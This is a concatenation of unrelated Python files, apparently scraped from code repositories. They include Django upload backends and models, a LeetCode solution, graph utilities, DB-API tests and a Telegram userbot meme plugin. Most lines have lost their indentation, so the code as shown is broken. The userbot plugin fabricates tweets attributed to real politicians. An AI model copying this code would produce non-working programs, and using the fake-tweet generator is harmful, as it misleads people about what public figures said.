current = dict(op='exist')
elif op == 'count':
if block_id == len(clevr_program) - 1:
current = dict(op='count')
elif op == 'equal_integer':
current = dict(op='count_equal')
elif op == 'less_than':
current = dict(op='count_less')
elif op == 'greater_than':
current = dict(op='count_greater')
else:
raise ValueError('Unknown CLEVR operation: {}.'.format(op))
if current is None:
assert len(block['inputs']) == 1
mapping[block_id] = mapping[block['inputs'][0]]
else:
current['inputs'] = list(map(mapping.get, block['inputs']))
if '_output' in block:
current['output'] = deepcopy(block['_output'])
nscl_program.append(current)
mapping[block_id] = len(nscl_program) - 1
return nscl_program
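# Worked example (not part of the original file); the CLEVR blocks are a
# hand-written illustration of the expected input format:
#
#     program = [
#         {'function': 'scene', 'inputs': [], 'value_inputs': []},
#         {'function': 'filter_color', 'inputs': [0], 'value_inputs': ['red']},
#         {'function': 'exist', 'inputs': [1], 'value_inputs': []},
#     ]
#     clevr_to_nsclseq(program)
#     # -> [{'op': 'scene', 'inputs': []},
#     #     {'op': 'filter', 'concept': ['red'], 'inputs': [0]},
#     #     {'op': 'exist', 'inputs': [1]}]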
|
#!/usr/bin/env python
from io import BufferedWriter, FileIO
import os
from ajaxuploader.backends.base import AbstractUploadBackend
from django.conf import settings
from panda.api import DataUploadResource, RelatedUploadResource, UserResource
from panda.models import Dataset, DataUpload, RelatedUpload, UserProxy
class PANDAAbstractUploadBackend(AbstractUploadBackend):
"""
Customized backend to handle AJAX uploads.
"""
def update_filename(self, request, filename):
"""
Verify that the filename is unique, if it isn't append and iterate
a counter until it is.
"""
self._original_filename = filename
filename = self._original_filename
root, ext = os.path.splitext(self._original_filename)
path = os.path.join(settings.MEDIA_ROOT, filename)
i = 1
while os.path.exists(path):
filename = '%s%i%s' % (root, i, ext)
path = os.path.join(settings.MEDIA_ROOT, filename)
i += 1
return filename
def setup(self, filename):
"""
Open the destination file for writing.
"""
self._path = os.path.join(settings.MEDIA_ROOT, filename)
try:
os.makedirs(os.path.realpath(os.path.dirname(self._path)))
except OSError:
    # The directory may already exist
    pass
self._dest = BufferedWriter(FileIO(self._path, "w"))
def upload_chunk(self, chunk):
"""
Write a chunk of data to the destination.
"""
self._dest.write(chunk)
def upload_complete(self, request, filename):
"""
Close the destination file.
"""
self._dest.close()
class PANDADataUploadBackend(PANDAAbstractUploadBackend):
"""
Backend specifically for DataUploads.
"""
def upload_complete(self, request, filename):
"""
Create a DataUpload object.
"""
try:
super(PANDADataUploadBackend, self).upload_complete(request, filename)
root, ext = os.path.splitext(filename)
path = os.path.join(settings.MEDIA_ROOT, filename)
size = os.path.getsize(path)
if 'dataset_slug' in request.REQUEST:
dataset = Dataset.objects.get(slug=request.REQUEST['dataset_slug'])
else:
dataset = None
encoding = request.REQUEST.get('encoding', 'utf-8')
if not encoding:
encoding = 'utf-8'
# Because users may have authenticated via headers the request.user may
# not be a full User instance. To be sure, we fetch one.
creator = UserProxy.objects.get(id=request.user.id)
upload = DataUpload.objects.create(
filename=filename,
original_filename=self._original_filename,
size=size,
creator=creator,
dataset=dataset,
encoding=encoding)
if dataset:
dataset.update_full_text()
resource = DataUploadResource()
bundle = resource.build_bundle(obj=upload, request=request)
data = resource.full_dehydrate(bundle).data
# django-ajax-uploader does not use the Tastypie serializer
# so we must 'manually' serialize the embedded resource bundle
resource = UserResource()
bundle = data['creator']
user_data = resource.full_dehydrate(bundle).data
data['creator'] = user_data
except Exception as e:
    # This global error handler is a kludge to ensure IE8 can properly handle the responses
    return { 'error_message': str(e), 'success': False }
return data
class PANDARelatedUploadBackend(PANDAAbstractUploadBackend):
"""
Backend specifically for RelatedUploads.
"""
def upload_complete(self, request, filename):
"""
Create a RelatedUpload object.
"""
try:
super(PANDARelatedUploadBackend, self).upload_complete(request, filename)
root, ext = os.path.splitext(filename)
path = os.path.join(settings.MEDIA_ROOT, filename)
size = os.path.getsize(path)
dataset = Dataset.objects.get(slug=request.REQUEST['dataset_slug'])
# Because users may have authenticated via headers the request.user may
# not be a full User instance. To be sure, we fetch one.
creator = UserProxy.objects.get(id=request.user.id)
upload = RelatedUpload.objects.create(
filename=filename,
original_filename=self._original_filename,
size=size,
creator=creator,
dataset=dataset)
dataset.update_full_text()
resource = RelatedUploadResource()
bundle = resource.build_bundle(obj=upload, request=request)
data = resource.full_dehydrate(bundle).data
# django-ajax-uploader does not use the Tastypie serializer
# so we must 'manually' serialize the embedded resource bundle
resource = UserResource()
bundle = data['creator']
user_data = resource.full_dehydrate(bundle).data
data['creator'] = user_data
except Exception as e:
    # This global error handler is a kludge to ensure IE8 can properly handle the responses
    return { 'error_message': str(e), 'success': False }
return data
|
#!/usr/bin/env python3
# Copyright (c) 2004-present Facebook All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from enum import Enum
class Entity(Enum):
Location = "Location"
LocationType = "LocationType"
Equipment = "Equipment"
EquipmentType = "EquipmentType"
EquipmentPort = "EquipmentPort"
EquipmentPortType = "EquipmentPortType"
Link = "Link"
Service = "Service"
ServiceType = "ServiceType"
ServiceEndpoint = "ServiceEndpoint"
ServiceEndpointDefinition = "ServiceEndpointDefinition"
SiteSurvey = "SiteSurvey"
Customer = "Customer"
Document = "Document"
PropertyType = "PropertyType"
Property = "Property"
User = "User"
WorkOrder = "WorkOrder"
WorkOrderType = "WorkOrderType"
ProjectType = "ProjectType"
Project = "Project"
|
"""
Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.
You must implement a solution with a linear runtime complexity and use only constant extra space.
Example 1:
Input: nums = [2,2,1]
Output: 1
Example 2:
Input: nums = [4,1,2,1,2]
Output: 4
Example 3:
Input: nums = [1]
Output: 1
Constraints:
1 <= nums.length <= 3 * 104
-3 * 104 <= nums[i] <= 3 * 104
Each element in the array appears twice except for one element which appears only once.
"""
from typing import List

class Solution:
def singleNumber(self, nums: List[int]) -> int:
res = 0
for i in range(len(nums)):
res ^= nums[i]
return res
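# The XOR trick works because a ^ a == 0 and a ^ 0 == a, so paired values
# cancel and only the single element survives. For example:
#
#     Solution().singleNumber([4, 1, 2, 1, 2])  # -> 4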
|
""" Some Modules Imported by @Nitesh_231 :) & Again @heyworld roks *_* """
import asyncio
import os
import re
import requests
from html_telegraph_poster.upload_images import upload_image
from PIL import Image, ImageDraw, ImageFont
from telegraph import exceptions, upload_file
from validators.url import url
from wget import download
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, TEMP_DOWNLOAD_DIRECTORY, bot
from userbot.events import bdrl_cmd
from userbot.utils import bash, deEmojify
def convert_toimage(image):
img = Image.open(image)
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
os.remove(image)
return "temp.jpg"
async def threats(text):
r = requests.get(f"https://nekobot.xyz/api/imagegen?type=threats&url={text}").json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png")
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def trash(text):
r = requests.get(f"https://nekobot.xyz/api/imagegen?type=trash&url={text}").json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png")
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def trap(text1, text2, text3):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=trap&name={text1}&author={text2}&image={text3}"
).json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png")
if img.mode != "RGB":
img = img.convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def phss(uplded, input, name):
web = requests.get(
f"https://nekobot.xyz/api/imagegen?type=phcomment&image={uplded}&text={input}&username={name}"
).json()
alf = web.get("message")
uri = url(alf)
if not uri:
return "check syntax once more"
with open("alf.png", "wb") as f:
f.write(requests.get(alf).content)
img = Image.open("alf.png").convert("RGB")
img.save("alf.jpg", "jpeg")
return "alf.jpg"
async def trumptweet(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=trumptweet&text={text}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.jpg", "jpeg")
return "gpx.jpg"
async def changemymind(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=changemymind&text={text}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.jpg", "jpeg")
return "gpx.jpg"
async def kannagen(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=kannagen&text={text}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.webp", "webp")
return "gpx.webp"
async def moditweet(text):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=tweet&text={text}&username=narendramodi"
).json()
sandy = r.get("message")
caturl = url(sandy)
if not caturl:
return "check syntax once more"
with open("temp.png", "wb") as f:
f.write(requests.get(sandy).content)
img = Image.open("temp.png").convert("RGB")
img.save("temp.jpg", "jpeg")
return "temp.jpg"
async def tweets(text1, text2):
r = requests.get(
f"https://nekobot.xyz/api/imagegen?type=tweet&text={text1}&username={text2}"
).json()
geng = r.get("message")
kapak = url(geng)
if not kapak:
return "check syntax once more"
with open("gpx.png", "wb") as f:
f.write(requests.get(geng).content)
img = Image.open("gpx.png").convert("RGB")
img.save("gpx.jpg", "jpeg")
return "gpx.jpg"
async def get_user_from_event(event):
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
user_obj = await event.client.get_entity(previous_message.from_id)
return user_obj
async def purge():
try:
await bash("rm -rf *.png *.webp")
except OSError:
pass
@bot.on(bdrl_cmd(outgoing=True, pattern=r"trump(?: |$)(.*)"))
async def trump(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
            await event.edit("`Send your text to Trump so he can tweet.`")
return
await event.edit("`Requesting trump to tweet...`")
text = deEmojify(text)
img = await trumptweet(text)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(pattern=r"modi(?: |$)(.*)", outgoing=True))
async def nekobot(event):
text = event.pattern_match.group(1)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
            await event.edit("Send your text to Modi so he can tweet.")
return
await event.edit("Requesting modi to tweet...")
text = deEmojify(text)
file = await moditweet(text)
await event.client.send_file(event.chat_id, file, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(outgoing=True, pattern=r"cmm(?: |$)(.*)"))
async def cmm(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
            await event.edit("`Give some text to write on the banner!`")
            return
    await event.edit("`Your banner is being created, wait a sec...`")
text = deEmojify(text)
img = await changemymind(text)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(outgoing=True, pattern=r"kanna(?: |$)(.*)"))
async def kanna(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply and not reply_to_id.media:
text = reply_to_id.message
else:
            await event.edit("`What should Kanna write? Give some text!`")
return
await event.edit("`Kanna is writing your text...`")
text = deEmojify(text)
img = await kannagen(text)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(outgoing=True, pattern=r"\.tweet(?: |$)(.*)"))
async def tweet(event):
text = event.pattern_match.group(1)
text = re.sub("&", "", text)
reply_to_id = event.message
if event.reply_to_msg_id:
reply_to_id = await event.get_reply_message()
if not text:
if event.is_reply:
if not reply_to_id.media:
text = reply_to_id.message
else:
                await event.edit("`What should I tweet? Give your username and tweet!`")
return
else:
            await event.edit("`What should I tweet? Give your username and tweet!`")
return
if "." in text:
username, text = text.split(".", 1)
else:
        await event.edit("`What should I tweet? Give your username and tweet!`")
        return
    await event.edit(f"`Requesting {username} to tweet...`")
text = deEmojify(text)
img = await tweets(text, username)
await event.client.send_file(event.chat_id, img, reply_to=reply_to_id)
await event.delete()
await purge()
@bot.on(bdrl_cmd(pattern=r"threat(?: |$)(.*)", outgoing=True))
async def nekobot(event):
replied = await event.get_reply_message()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
if not replied:
await event.edit("reply to a supported media file")
return
if replied.media:
await event.edit("passing to telegraph...")
else:
await event.edit("reply to a supported media file")
return
download_location = await bot.download_media(replied, TEMP_DOWNLOAD_DIRECTORY)
if download_location.endswith((".webp")):
download_location = convert_toimage(download_location)
size = os.stat(download_location).st_size
if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")):
if size > 5242880:
            await event.edit(
                "the replied file size is not supported, it must be below 5 MB"
            )
os.remove(download_location)
return
await event.edit("generating image..")
else:
await event.edit("the replied file is not supported")
os.remove(download_location)
return
try:
response = upload_file(download_location)
os.remove(download_location)
except exceptions.TelegraphException as exc:
await event.edit("ERROR: " + str(exc))
os.remove(download_location)
return
file = f"https://telegra.ph{response[0]}"
file = await threats(file)
await event.delete()
await bot.send_file(event.chat_id, file, reply_to=replied)
@bot.on(bdrl_cmd(pattern=r"trash(?: |$)(.*)", outgoing=True))
async def nekobot(event):
replied = await event.get_reply_message()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
if not replied:
await event.edit("reply to a supported media file")
return
if replied.media:
await event.edit("passing to telegraph...")
else:
await event.edit("reply to a supported media file")
return
download_location = await bot.download_media(replied, TEMP_DOWNLOAD_DIRECTORY)
if download_location.endswith((".webp")):
download_location = convert_toimage(download_location)
size = os.stat(download_location).st_size
if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")):
if size > 5242880:
            await event.edit(
                "the replied file size is not supported, it must be below 5 MB"
            )
os.remove(download_location)
return
await event.edit("generating image..")
else:
await event.edit("the replied file is not supported")
os.remove(download_location)
return
try:
response = upload_file(download_location)
os.remove(download_location)
except exceptions.TelegraphException as exc:
await event.edit("ERROR: " + str(exc))
os.remove(download_location)
return
file = f"https://telegra.ph{response[0]}"
file = await trash(file)
await event.delete()
await bot.send_file(event.chat_id, file, reply_to=replied)
@bot.on(bdrl_cmd(pattern=r"trap(?: |$)(.*)", outgoing=True))
async def nekobot(e):
input_str = e.pattern_match.group(1)
input_str = deEmojify(input_str)
if "|" in input_str:
text1, text2 = input_str.split("|")
else:
        await e.edit(
            "Reply to an image or sticker, then type `.trap (name of the person being trapped)|(trap name)`"
        )
return
replied = await e.get_reply_message()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.makedirs(TEMP_DOWNLOAD_DIRECTORY)
if not replied:
await e.edit("reply to a supported media file")
return
if replied.media:
await e.edit("passing to telegraph...")
else:
await e.edit("reply to a supported media file")
return
download_location = await bot.download_media(replied, TEMP_DOWNLOAD_DIRECTORY)
if download_location.endswith((".webp")):
download_location = convert_toimage(download_location)
size = os.stat(download_location).st_size
if download_location.endswith((".jpg", ".jpeg", ".png", ".bmp", ".ico")):
if size > 5242880:
            await e.edit("the replied file size is not supported, it must be below 5 MB")
os.remove(download_location)
return
await e.edit("generating image..")
else:
await e.edit("the replied file is not supported")
os.remove(download_location)
return
try:
response = upload_file(download_location)
os.remove(download_location)
except exceptions.TelegraphException as exc:
await e.edit("ERROR: " + str(exc))
os.remove(download_location)
return
file = f"https://telegra.ph{response[0]}"
file = await trap(text1, text2, file)
await e.delete()
await bot.send_file(e.chat_id, file, reply_to=replied)
# Ported by @AshSTR
@bot.on(bdrl_cmd(outgoing=True, pattern=r"fgs ((.*) ; (.*))"))
async def FakeGoogleSearch(event):
"""Get a user-customised google search meme!"""
input_str = event.pattern_match.group(1)
if input_str is None:
await event.edit("No input found!", del_in=5)
return
if ";" in input_str:
search, result = input_str.split(";", 1)
else:
await event.edit("Invalid Input! Check help for more info!", del_in=5)
return
await event.edit("Connecting to `https://www.google.com/` ...")
await asyncio.sleep(2)
img = "https://i.imgur.com/wNFr5X2.jpg"
r = download(img)
photo = Image.open(r)
drawing = ImageDraw.Draw(photo)
blue = (0, 0, 255)
black = (0, 0, 0)
font1 = ImageFont.truetype("userbot/utils/styles/ProductSans-BoldItalic.ttf", 20)
font2 = ImageFont.truetype("userbot/utils/styles/ProductSans-Light.ttf", 23)
drawing.text((450, 258), result, fill=blue, font=font1)
drawing.text((270, 37), search, fill=black, font=font2)
photo.save("downloads/test.jpg")
    reply_id = event.reply_to_msg_id
    await event.delete()
    await event.client.send_file(
        event.chat_id, "downloads/test.jpg", reply_to=reply_id
    )
os.remove("downloads/test.jpg")
@bot.on(bdrl_cmd(outgoing=True, pattern=r"ph(?: |$)(.*)"))
async def phcomment(event):
try:
await event.edit("`Processing..`")
text = event.pattern_match.group(1)
reply = await event.get_reply_message()
if reply:
user = await get_user_from_event(event)
if user.last_name:
name = user.first_name + " " + user.last_name
else:
name = user.first_name
text = text or str(reply.message)
elif text:
user = await bot.get_me()
if user.last_name:
name = user.first_name + " " + user.last_name
else:
name = user.first_name
else:
return await event.edit("`Give text..`")
try:
photo = await event.client.download_profile_photo(
user.id,
str(user.id) + ".png",
download_big=False,
)
uplded = upload_image(photo)
except BaseException:
uplded = "https://telegra.ph/file/7d110cd944d54f72bcc84.jpg"
except BaseException as e:
await purge()
return await event.edit(f"`Error: {e}`")
img = await phss(uplded, text, name)
try:
await event.client.send_file(
event.chat_id,
img,
reply_to=event.reply_to_msg_id,
)
except BaseException:
await purge()
return await event.edit("`Reply message has no text!`")
await event.delete()
await purge()
CMD_HELP.update(
    {
        "imgmeme": f"**Plugin : **`imgmeme`\
    \n\n • **Syntax :** `{cmd}fgs`\
    \n • **Function : **Generate a Google-search meme that the user can customize!\
    \n • **Example : **`{cmd}fgs [Search Text] ; [Result Text]`\
    \n\n • **Syntax :** `{cmd}trump`\
    \n • **Function : **Create a tweet from Donald Trump's Twitter account\
    \n\n • **Syntax :** `{cmd}modi` <text>\
    \n • **Function : **Create a tweet from the @narendramodi Twitter account\
    \n\n • **Syntax :** `{cmd}cmm` <text>\
    \n • **Function : **Create a 'change my mind' meme\
    \n\n • **Syntax :** `{cmd}kanna` <text>\
    \n • **Function : **Create a meme of Kanna holding a paper with your text\
    \n\n • **Syntax :** `{cmd}ph` <text>\
    \n • **Function : **Create a Pornhub-style comment image\
    \n\n • **Syntax :** `{cmd}threat` <text> (while replying to a photo/sticker)\
    \n • **Function : **Create the 'three biggest threats' meme\
    \n\n • **Syntax :** `{cmd}trash` <text> (while replying to a photo/sticker)\
    \n • **Function : **Create a 'trash' meme\
    \n\n • **Syntax :** `{cmd}trap` <text> (while replying to a photo/sticker)\
    \n • **Function : **Create a trap-card meme\
    \n\n • **Syntax :** `{cmd}tweet`\
    \n • **Function : **Create a tweet from any Twitter account\
    \n • **Example : **{cmd}tweet @mrismanaziz.ganteng (the . [dot] separator is required)\
    "
}
)
|
import sys
import json
from random import seed
from random import randint
import boto3
sys.path.insert(0, "../src")
import bioims
artifactClient = bioims.client('artifact')
# print(artifactClient.getLambdaArn())
# seed(1)
# mids=[]
# for i in range(10):
# artifact = {
# "contextId" : 'plate-'+str(i),
# "trainId" : 'train-id-'+str(i),
# "artifact" : 's3key#'+str(i),
# "s3bucket" : 's3bucket-'+str(i),
# "description" : 'type-'+str(i)
# }
# r = artifactClient.createArtifact(artifact)
# print(r)
# for i in range(10):
# r = artifactClient.getArtifacts('plate-'+str(i), 'train-id-'+str(i))
# print(r)
# for i in range(10):
# artifact = {
# "contextId" : 'plate-'+str(i),
# "trainId" : 'train-id-'+str(i),
# "artifact" : 's3key#'+str(i)+'-2',
# "s3bucket" : 's3bucket-'+str(i),
# "description" : 'type-'+str(i)
# }
# r = artifactClient.createArtifact(artifact)
# print(r)
# for i in range(10):
# r = artifactClient.getArtifacts('plate-'+str(i), 'train-id-'+str(i))
# print(r)
# for i in range(10):
# r = artifactClient.deleteArtifacts('plate-'+str(i), 'train-id-'+str(i))
# print(r)
#r = artifactClient.createDescribeStacksArtifact("context-id-123456", "train-id-123456")
#print(r)
r = artifactClient.getArtifacts('1xDNMw2ZFhpSGDTppgyeMU', 'origin')
print(r)
|
import uuid
import os
from django.db import models
from django.contrib.auth.models import (AbstractBaseUser, BaseUserManager,
PermissionsMixin)
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads/recipe/', filename)
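# Illustrative example (an addition, not in the original module): for an upload
# named "photo.png" this returns a path such as
# 'uploads/recipe/16fd2706-8baf-433b-82eb-8c7fada847da.png' (the UUID varies).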
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
'''
        Creates and saves a user with the given email
'''
if not email:
raise ValueError('The Email must be set')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password, **extra_fields):
'''
        Creates and saves a superuser with the given email
'''
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self.db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using emails instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
def __str__(self):
return self.email
class Tag(models.Model):
"""Tag to be used for a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.CASCADE)
class Meta:
ordering = ["id"]
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredients to be used in a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe Object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
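# Minimal usage sketch (an assumption, not part of the original module: Django is
# configured with this app's User model as AUTH_USER_MODEL and migrations applied;
# the values below are made up):
#
#   from decimal import Decimal
#   user = User.objects.create_user(email="cook@example.com", password="secret")
#   recipe = Recipe.objects.create(
#       user=user, title="Pancakes", time_minutes=10, price=Decimal("5.00"))
#   recipe.tags.add(Tag.objects.create(user=user, name="breakfast"))
#   recipe.ingredients.add(Ingredient.objects.create(user=user, name="flour"))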
|
# -*- coding: utf-8 -*-
"""Methods to generalize any graph for its path analysis."""
import logging
from typing import Dict, Tuple, Any, List
from networkx import DiGraph, isolates
__all__ = [
'generate_reduced_graph',
]
logger = logging.getLogger(__name__)
def remove_isolated_nodes(graph: DiGraph):
"""Remove isolated nodes from the graph.
:param graph: graph to be filtered
"""
nodes = list(isolates(graph))
graph.remove_nodes_from(nodes)
def _dict_to_graph(data: Dict[str, Any]) -> Tuple[DiGraph, Dict[str, int]]:
"""Convert dictionary representation of the graph to a directed graph.
:param data: graph as a dictionary
    :return: directed graph and a mapping from node name to node id
"""
graph = DiGraph()
node2id = {}
for node, properties in data['node_list'].items():
node2id[node] = properties['id']
graph.add_node(
int(properties['id']),
name=node,
isTarget=bool(properties['isTarget'])
)
for node, adj in data['adj_list'].items():
source = int(node)
increases = adj.get('increases', [])
decreases = adj.get('decreases', [])
for n in increases:
graph.add_edge(source, n, polarity=1)
for n in decreases:
graph.add_edge(source, n, polarity=-1)
return graph, node2id
def generate_reduced_graph(graph: DiGraph, target_nodes: List[Any]) -> Tuple[DiGraph, Dict[str, int]]:
"""Generate a reduced version of a graph.
:param graph: directed graph
:param target_nodes: target nodes
    :return: reduced directed graph and a mapping from node name to node id
"""
remove_isolated_nodes(graph)
node_list = {
f'{node}': {
'id': i,
            'isTarget': node in target_nodes,
}
for i, node in enumerate(graph.nodes())
}
adj_list = {}
# Counters
num_edges = 0
count_increases = 0
count_decreases = 0
for i, node in enumerate(graph.nodes()):
increases = []
decreases = []
        for neighbor in graph.neighbors(node):
            relation_sign = graph[node][neighbor].get('polarity')
            if not relation_sign:
                raise ValueError('Ensure that the edges of your graph carry the "polarity" attribute')
            # Add positive relation
            if relation_sign == 1:
                increases.append(node_list[f'{neighbor}']['id'])
                count_increases += 1
            # Add negative relation
            elif relation_sign == -1:
                decreases.append(node_list[f'{neighbor}']['id'])
                count_decreases += 1
            # Raise an error for unrecognized relation values
            else:
                raise ValueError(f"Unknown relation: {relation_sign}")
if increases or decreases:
adj_list[i] = {}
if increases:
adj_list[i]['increases'] = increases
if decreases:
adj_list[i]['decreases'] = decreases
num_edges += len(increases) + len(decreases)
num_nodes = len(node_list)
graph_data = {
'num_nodes': num_nodes,
'num_edges': num_edges,
'node_list': node_list,
'adj_list': adj_list
}
logger.debug(
f"Number of nodes:{num_nodes}\n"
f"Number of edges: {num_edges}\n"
f"Number of activations: {count_increases}\n"
f"Number of inhibitions: {count_decreases}\n"
)
return _dict_to_graph(graph_data)
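# Minimal usage sketch (an illustration, not part of the original module): it
# assumes edges carry a 'polarity' attribute of +1/-1, as required above; the
# node names and target below are made up.
if __name__ == '__main__':
    toy = DiGraph()
    toy.add_edge('A', 'B', polarity=1)   # A activates B
    toy.add_edge('B', 'C', polarity=-1)  # B inhibits C
    reduced, name_to_id = generate_reduced_graph(toy, target_nodes=['C'])
    print(reduced.number_of_nodes(), reduced.number_of_edges(), name_to_id)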
|
# Read the inputs
rate = input("Enter Rate:")
hrs = input("Enter Hours:")
# Convert both values to float, since a string and a float cannot be multiplied directly
pay = float(rate) * float(hrs)
# Print the resulting pay
print("Pay:",pay)
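# Example run (illustrative): entering a rate of 10.50 and 40 hours prints "Pay: 420.0".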
|
# encoding: utf-8
"""Shared DB-API test cases"""
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import object
from builtins import range
from future.utils import with_metaclass
from avanthive import exc
import abc
import contextlib
import functools
def with_cursor(fn):
"""Pass a cursor to the given function and handle cleanup.
The cursor is taken from ``self.connect()``.
"""
@functools.wraps(fn)
def wrapped_fn(self, *args, **kwargs):
with contextlib.closing(self.connect()) as connection:
with contextlib.closing(connection.cursor()) as cursor:
fn(self, cursor, *args, **kwargs)
return wrapped_fn
class DBAPITestCase(with_metaclass(abc.ABCMeta, object)):
@abc.abstractmethod
def connect(self):
raise NotImplementedError # pragma: no cover
@with_cursor
def test_fetchone(self, cursor):
cursor.execute('SELECT * FROM one_row')
self.assertEqual(cursor.rownumber, 0)
self.assertEqual(cursor.fetchone(), (1,))
self.assertEqual(cursor.rownumber, 1)
self.assertIsNone(cursor.fetchone())
@with_cursor
def test_fetchall(self, cursor):
cursor.execute('SELECT * FROM one_row')
self.assertEqual(cursor.fetchall(), [(1,)])
cursor.execute('SELECT a FROM many_rows ORDER BY a')
self.assertEqual(cursor.fetchall(), [(i,) for i in range(10000)])
@with_cursor
def test_null_param(self, cursor):
cursor.execute('SELECT %s FROM one_row', (None,))
self.assertEqual(cursor.fetchall(), [(None,)])
@with_cursor
def test_iterator(self, cursor):
cursor.execute('SELECT * FROM one_row')
self.assertEqual(list(cursor), [(1,)])
self.assertRaises(StopIteration, cursor.__next__)
@with_cursor
def test_description_initial(self, cursor):
self.assertIsNone(cursor.description)
@with_cursor
def test_description_failed(self, cursor):
try:
cursor.execute('blah_blah')
except exc.DatabaseError:
pass
self.assertIsNone(cursor.description)
@with_cursor
def test_bad_query(self, cursor):
def run():
cursor.execute('SELECT does_not_exist FROM this_really_does_not_exist')
cursor.fetchone()
self.assertRaises(exc.DatabaseError, run)
@with_cursor
def test_concurrent_execution(self, cursor):
cursor.execute('SELECT * FROM one_row')
cursor.execute('SELECT * FROM one_row')
self.assertEqual(cursor.fetchall(), [(1,)])
@with_cursor
def test_executemany(self, cursor):
for length in 1, 2:
cursor.executemany(
'SELECT %(x)d FROM one_row',
[{'x': i} for i in range(1, length + 1)]
)
self.assertEqual(cursor.fetchall(), [(length,)])
@with_cursor
def test_executemany_none(self, cursor):
cursor.executemany('should_never_get_used', [])
self.assertIsNone(cursor.description)
self.assertRaises(exc.ProgrammingError, cursor.fetchone)
@with_cursor
def test_fetchone_no_data(self, cursor):
self.assertRaises(exc.ProgrammingError, cursor.fetchone)
@with_cursor
def test_fetchmany(self, cursor):
cursor.execute('SELECT * FROM many_rows LIMIT 15')
self.assertEqual(cursor.fetchmany(0), [])
self.assertEqual(len(cursor.fetchmany(10)), 10)
self.assertEqual(len(cursor.fetchmany(10)), 5)
